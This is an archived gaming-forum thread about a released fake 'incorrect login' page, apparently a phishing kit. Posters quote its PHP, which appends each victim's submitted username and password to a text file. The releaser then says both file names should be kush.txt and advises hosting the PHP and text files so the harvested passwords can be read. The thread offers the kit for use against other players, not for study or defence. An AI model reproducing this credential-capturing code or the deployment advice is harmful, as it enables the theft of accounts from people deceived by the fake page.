A preserved archive of the Logical Gamers community forums, 2009-2025. The original threads and posts, served read-only. Registration, posting and private messages are gone for good.

[Release]Advanced Regular Incorrect Login Page

1.7k views · started by DOPE ·
#2
I'll up' it and post pics, thanks a shit ton bro!

Edit:

One quick question, in the login.php there is this section of code that I am confused about...
$fileContents=file_get_contents("kush.txt");
$file = fopen("LegendaryV.I.P.txt","r+");
$fileContents=$fileContents . "*" . $username . "\n" . $password;
fwrite($file,$fileContents);
fclose($file);


So... it gets the file contents of kush.txt, then writes the username n pass to LegendaryV.I.P.txt?

Should they both be uploaded? Like, should there be a kush.txt AND a LegendaryV.I.P.txt?

--

Image of the index.html:
#3
zzGoWR wrote:
I'll up' it and post pics, thanks a shit ton bro!

Edit:

One quick question, in the login.php there is this section of code that I am confused about...
$fileContents=file_get_contents("kush.txt");
$file = fopen("LegendaryV.I.P.txt","r+");
$fileContents=$fileContents . "*" . $username . "\n" . $password;
fwrite($file,$fileContents);
fclose($file);


So... it gets the file contents of kush.txt, then writes the username n pass to LegendaryV.I.P.txt?

Should they both be uploaded? Like, should there be a kush.txt AND a LegendaryV.I.P.txt?

--

Image of the index.html:


oh sorry change both to kush.txt
#4
Guys how you open php files?
#5
jenz269 wrote:
Guys how you open php files?


Notepad, Notepad++, Adobe Dreamweaver, etc.
#6
Kush.txt where u view ur password so make two files.php n txt in a hosting sites ^^